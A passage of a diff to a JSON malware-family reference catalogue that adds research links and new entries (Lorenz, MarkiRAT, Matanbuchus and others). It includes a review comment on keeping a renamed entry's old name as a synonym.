- "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
- "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html",
+ "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
+ "https://github.com/R3MRUM/loki-parse",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
 "https://lab52.io/blog/a-twisted-malware-infection-chain/",
+ "https://www.youtube.com/watch?v=-FxyzuRv6Wg",
 "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
 "https://news.sophos.com/en-us/2020/05/14/raticate/",
+ "http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html",
 "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf",
- "https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html",
+ "https://isc.sans.edu/diary/27282",
+ "https://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html",
 "https://clickallthethings.wordpress.com/2020/03/31/lokibot-getting-equation-editor-shellcode/",
 "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/loki-info-stealer-propagates-through-lzh-files",
 "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html",
 "https://www.lastline.com/blog/password-stealing-malware-loki-bot/",
 "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
 "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/",
 "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://www.youtube.com/watch?v=N0wAh26wShE",
 "https://marcoramilli.com/2019/10/28/sweed-targeting-precision-engineering-companies-in-italy/",
 "https://phishme.com/loki-bot-malware/",
 "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/"
@@ -20330,6 +23191,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.longwatch",
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
 "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html"
 ],
 "synonyms": [],
@@ -20352,7 +23214,7 @@
 "type": []
 },
 "uuid": "4b83ba50-7d50-48b4-bb70-fcbcacd23340",
- "value": "looChiper Ransomware"
+ "value": "looChiper"
 },
 {
 "description": "",
@@ -20362,6 +23224,7 @@
 "https://threatgen.com/taking-a-closer-look-at-the-lookback-malware-campaign-part-1/",
 "https://nao-sec.org/2021/01/royal-road-redive.html",
 "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf",
+ "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/",
 "https://www.proofpoint.com/us/threat-insight/post/lookback-forges-ahead-continued-targeting-united-states-utilities-sector-reveals",
 "https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks",
 "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new",
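Review bot: The looChiper hunk changes `value` from `"looChiper Ransomware"` to `"looChiper"` while keeping the uuid, and a consumer that keys on the value string (galaxy tags are built from it) will stop matching the old name silently. Unless the entry's `synonyms` already lists the previous name — that line is just outside this hunk — adding it there, `"synonyms": ["looChiper Ransomware"]`, would keep the rename backward-compatible for existing tags and lookups.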
@@ -20392,6 +23255,22 @@
 "uuid": "fa61a690-fd9c-4036-97fb-bf3674aa60b2",
 "value": "L0rdix"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lorenz",
+ "https://www.bleepingcomputer.com/news/security/meet-lorenz-a-new-ransomware-gang-targeting-the-enterprise/",
+ "https://twitter.com/AltShiftPrtScn/status/1423190900516302860?s=20",
+ "https://therecord.media/free-decrypter-available-for-lorenz-ransomware/",
+ "https://www.tesorion.nl/en/posts/lorenz-ransomware-analysis-and-a-free-decryptor/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3ec79052-d8c0-49b2-9204-42f9d8f035f8",
+ "value": "Lorenz"
+ },
 {
 "description": "Frank Boldewin describes Loup as a small cli-tool to cash out NCR devices (ATM).",
 "meta": {
@@ -20412,7 +23291,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball",
 "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/",
- "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html"
+ "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html",
+ "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/"
 ],
 "synonyms": [],
 "type": []
@@ -20594,11 +23474,16 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber",
- "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/",
 "https://medium.com/coinmonks/passive-income-of-cyber-criminals-dissecting-bitcoin-multiplier-scam-b9d2b6048372",
- "https://www.youtube.com/watch?v=lqWJaaofNf4",
+ "https://therecord.media/printnightmare-vulnerability-weaponized-by-magniber-ransomware-gang/",
+ "https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/",
+ "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/",
+ "https://www.cybereason.com/blog/threat-analysis-report-printnightmare-and-magniber-ransomware",
 "http://asec.ahnlab.com/1124",
- "https://asec.ahnlab.com/en/19273/"
+ "https://decoded.avast.io/janvojtesek/magnitude-exploit-kit-still-alive-and-kicking/",
+ "https://www.youtube.com/watch?v=lqWJaaofNf4",
+ "https://asec.ahnlab.com/en/19273/",
+ "https://teamt5.org/tw/posts/internet-explorer-the-vulnerability-ridden-browser/"
 ],
 "synonyms": [],
 "type": []
@@ -20611,6 +23496,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.mailto",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
 "https://id-ransomware.blogspot.com/2019/09/koko-ransomware.html",
 "https://sites.temple.edu/care/ci-rw-attacks/",
 "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/take-a-netwalk-on-the-wild-side/",
@@ -20625,8 +23511,13 @@
 "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
 "https://lopqto.me/posts/automated-dynamic-import-resolving",
 "https://cert-agid.gov.it/news/netwalker-il-ransomware-che-ha-beffato-lintera-community/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-three-of-three/",
+ "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
+ "https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers",
 "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
 "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
 "https://blogs.blackberry.com/en/2021/03/zerologon-to-ransomware",
@@ -20635,11 +23526,16 @@
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-one-of-three/",
 "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/ReportCSIT-20081e.pdf",
+ "https://seguranca-informatica.pt/netwalker-ransomware-full-analysis/",
 "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million/",
 "https://www.ucsf.edu/news/2020/06/417911/update-it-security-incident-ucsf",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
 "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
 "https://krebsonsecurity.com/2021/01/arrest-seizures-tied-to-netwalker-ransomware",
 "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million",
+ "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
+ "https://www.justice.gov/usao-mdfl/press-release/file/1360846/download",
 "https://www.bleepingcomputer.com/news/security/michigan-state-university-network-breached-in-ransomware-attack/",
 "https://www.bleepingcomputer.com/news/security/mailto-netwalker-ransomware-targets-enterprise-networks/",
 "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
@@ -20650,9 +23546,12 @@
 "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
 "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
 "https://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/",
- "https://www.justice.gov/usao-mdfl/press-release/file/1360846/download",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
 "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
- "https://zengo.com/bitcoin-ransomware-detective-ucsf/"
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://zengo.com/bitcoin-ransomware-detective-ucsf/",
+ "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/"
 ],
 "synonyms": [
 "Koko Ransomware",
@@ -20663,6 +23562,22 @@
 "uuid": "722aab64-a02a-40fc-8c05-6b0344fad9b8",
 "value": "Mailto"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mail_o",
+ "https://rt-solar.ru/upload/iblock/b55/Ataki-na-FOIV_otchet-NKTSKI-i-Rostelekom_Solar_otkrytyy.pdf",
+ "https://blog.group-ib.com/task",
+ "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/",
+ "https://therecord.media/fsb-nktski-foreign-cyber-mercenaries-breached-russian-federal-agencies/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d41f513c-97e2-4588-a669-aa93b6378ef1",
+ "value": "Mail-O"
+ },
 {
 "description": "",
 "meta": {
@@ -20682,9 +23597,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs",
+ "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs",
 "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html",
- "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/",
- "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs"
+ "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
+ "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/"
 ],
 "synonyms": [],
 "type": []
@@ -20753,6 +23669,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba",
 "https://securelist.com/the-return-of-mamba-ransomware/79403/",
+ "https://www.ic3.gov/Media/News/2021/210323.pdf",
 "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/",
 "https://www.youtube.com/watch?v=LUxOcpIRxmg"
 ],
@@ -20885,6 +23802,19 @@
 "uuid": "6adb6fa0-1974-4d24-9c39-e76d5356cf6a",
 "value": "Mariposa"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.markirat",
+ "https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c19ac191-a881-437f-ae82-7bec174590cb",
+ "value": "MarkiRAT"
+ },
 {
 "description": "",
 "meta": {
@@ -20906,6 +23836,7 @@
 "https://fr3d.hk/blog/masslogger-frankenstein-s-creation",
 "https://medium.com/@mariohenkel/decrypt-masslogger-2-4-0-0-configuration-eff3ee0720a7",
 "https://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html",
+ "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html",
 "https://decoded.avast.io/anhho/masslogger-v3-a-net-stealer-with-serious-obfuscation/",
 "https://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/",
 "https://www.gdatasoftware.com/blog/2020/06/36129-harmful-logging-diving-into-masslogger",
@@ -20919,6 +23850,19 @@
 "uuid": "e1a09bf8-974a-4cc4-9ffd-758bed7a785e",
 "value": "MASS Logger"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus",
+ "https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e30f2243-9e69-4b09-97ab-1643929b97ad",
+ "value": "Matanbuchus"
+ },
 {
 "description": "",
 "meta": {
@@ -20937,9 +23881,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom",
- "https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf",
+ "https://unit42.paloaltonetworks.com/matrix-ransomware/",
 "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
- "https://blogs.blackberry.com/en/2018/11/threat-spotlight-inside-vssdestroy-ransomware"
+ "https://blogs.blackberry.com/en/2018/11/threat-spotlight-inside-vssdestroy-ransomware",
+ "https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -20988,82 +23933,119 @@
 "uuid": "feb5ac55-7b28-47aa-9e9e-5007d838c0d5",
 "value": "Maudi"
 },
+ {
+ "description": "Banking trojan written in Delphi, targeting customers of European and South American banks.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maxtrilha",
+ "https://seguranca-informatica.pt/the-new-maxtrilha-trojan-is-being-disseminated-and-targeting-several-banks/#.YT3_VfwzaKN"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "65799ce1-793d-4730-8d80-d829d7619dc6",
+ "value": "Maxtrilha"
+ },
 {
 "description": "Maze Ransomware encrypts files and makes them inaccessible while adding a custom extension containing part of the ID of the victim. The ransom note is placed inside a text file and an htm file. There are a few different extensions appended to files which are randomly generated.\r\n\r\nActors are known to exfiltrate the data from the network for further extortion. It spreads mainly using email spam and various exploit kits (Spelevo, Fallout). \r\n\r\nThe code of Maze ransomware is highly complicated and obfuscated, which helps to evade security solutions using signature-based detections.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.maze",
- "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Maze.md",
- "https://sites.temple.edu/care/ci-rw-attacks/",
- "https://www.secureworks.com/research/threat-profiles/gold-village",
- "https://www.docdroid.net/dUpPY5s/maze.pdf",
- "https://www.telsy.com/wp-content/uploads/Maze_Vaccine.pdf",
- "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/",
- "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
- "https://www.crowdstrike.com/blog/maze-ransomware-deobfuscation/",
- "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
- "https://techcrunch.com/2020/03/26/chubb-insurance-breach-ransomware/",
- "https://media-exp1.licdn.com/dms/document/C4E1FAQHyhJYCWxq5eg/feedshare-document-pdf-analyzed/0?e=1584129600&v=beta&t=9wTDR-mZPDF4ET7ABNgE2ab9g8e9wxQrhXsxI1cSX8U",
- "https://labs.sentinelone.com/case-study-catching-a-human-operated-maze-ransomware-attack-in-action/",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
- "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer",
- "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
- "https://www.bleepingcomputer.com/news/security/maze-ransomware-behind-pensacola-cyberattack-1m-ransom-demand/",
- "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
- "https://krebsonsecurity.com/2019/12/ransomware-gangs-now-outing-victim-businesses-that-dont-pay-up/",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/",
- "https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us",
- "https://www.brighttalk.com/webcast/7451/408167/navigating-maze-analysis-of-a-rising-ransomware-threat",
- "https://www.zdnet.com/article/ransomware-gang-publishes-tens-of-gbs-of-internal-data-from-lg-and-xerox/",
+ "https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.docdroid.net/dUpPY5s/maze.pdf",
+ "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html",
+ "https://www.zdnet.com/article/ransomware-gang-publishes-tens-of-gbs-of-internal-data-from-lg-and-xerox/",
+ "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/",
 "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
- "https://www.bleepingcomputer.com/news/security/allied-universal-breached-by-maze-ransomware-stolen-data-leaked/",
- "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis",
- "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
 "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/",
 "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
- "https://securelist.com/maze-ransomware/99137/",
- "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
 "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/escape-from-the-maze/",
- "https://oag.ca.gov/system/files/Letter%204.pdf",
- "https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/",
- "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-delivered-by-spelevo-exploit-kit/",
- "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
- "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/",
 "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
- "https://www.bleepingcomputer.com/news/security/chipmaker-maxlinear-reports-data-breach-after-maze-ransomware-attack/",
 "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
 "https://blog.talosintelligence.com/2019/12/IR-Lessons-Maze.html",
 "https://www.zataz.com/cyber-attaque-a-lencontre-des-serveurs-de-bouygues-construction/",
- "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf",
+ "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
 "https://download.bitdefender.com/resources/files/News/CaseStudies/study/318/Bitdefender-TRR-Whitepaper-Maze-creat4351-en-EN-GenericUse.pdf",
- "https://killbit.medium.com/applying-the-diamond-model-to-cognizant-msp-and-maze-ransomware-and-a-policy-assessment-498f01bd723f",
- "https://www.bleepingcomputer.com/news/security/maze-ransomware-releases-files-stolen-from-city-of-pensacola/",
- "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
 "https://www.cityofpensacola.com/DocumentCenter/View/18879/Deloitte-Executive-Summary-PDF",
- "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
+ "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
+ "https://securelist.com/targeted-ransomware-encrypting-data/99255/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Maze.md",
+ "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
+ "https://sites.temple.edu/care/ci-rw-attacks/",
+ "https://www.secureworks.com/research/threat-profiles/gold-village",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
+ "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.bleepingcomputer.com/news/security/maze-ransomware-behind-pensacola-cyberattack-1m-ransom-demand/",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/",
+ "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
+ "https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/",
+ "https://www.bleepingcomputer.com/news/security/chipmaker-maxlinear-reports-data-breach-after-maze-ransomware-attack/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf",
+ "https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/",
+ "https://twitter.com/certbund/status/1192756294307995655",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf",
+ "https://oag.ca.gov/system/files/Letter%204.pdf",
 "https://blogs.quickheal.com/maze-ransomware-continues-threat-consumers/",
- "https://id-ransomware.blogspot.com/2019/05/chacha-ransomware.html",
+ "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/",
+ "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/",
+ "https://www.bleepingcomputer.com/news/security/it-services-giant-cognizant-suffers-maze-ransomware-cyber-attack/",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Maze.md",
+ "https://techcrunch.com/2020/03/26/chubb-insurance-breach-ransomware/",
+ "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer",
+ "https://www.crowdstrike.com/blog/maze-ransomware-deobfuscation/",
+ "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
+ "https://krebsonsecurity.com/2019/12/ransomware-gangs-now-outing-victim-businesses-that-dont-pay-up/",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis",
+ "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-delivered-by-spelevo-exploit-kit/",
+ "https://killbit.medium.com/applying-the-diamond-model-to-cognizant-msp-and-maze-ransomware-and-a-policy-assessment-498f01bd723f",
+ "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
 "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts-via-virtual-machines-to-evade-detection/",
 "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
 "https://nakedsecurity.sophos.com/2020/06/04/nuclear-missile-contractor-hacked-in-maze-ransomware-attack/",
- "https://securelist.com/targeted-ransomware-encrypting-data/99255/",
- "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://adversary.crowdstrike.com/adversary/twisted-spider/",
+ 
"https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://web.archive.org/save/https://news.cognizant.com/2020-04-18-cognizant-security-update", - "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", - "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", - "https://twitter.com/certbund/status/1192756294307995655", - "https://github.com/albertzsigovits/malware-notes/blob/master/Maze.md", - "https://www.bleepingcomputer.com/news/security/it-services-giant-cognizant-suffers-maze-ransomware-cyber-attack/" + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-releases-files-stolen-from-city-of-pensacola/", + "https://media-exp1.licdn.com/dms/document/C4E1FAQHyhJYCWxq5eg/feedshare-document-pdf-analyzed/0?e=1584129600&v=beta&t=9wTDR-mZPDF4ET7ABNgE2ab9g8e9wxQrhXsxI1cSX8U", + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://labs.sentinelone.com/case-study-catching-a-human-operated-maze-ransomware-attack-in-action/", + "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", + "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", + "https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us", + 
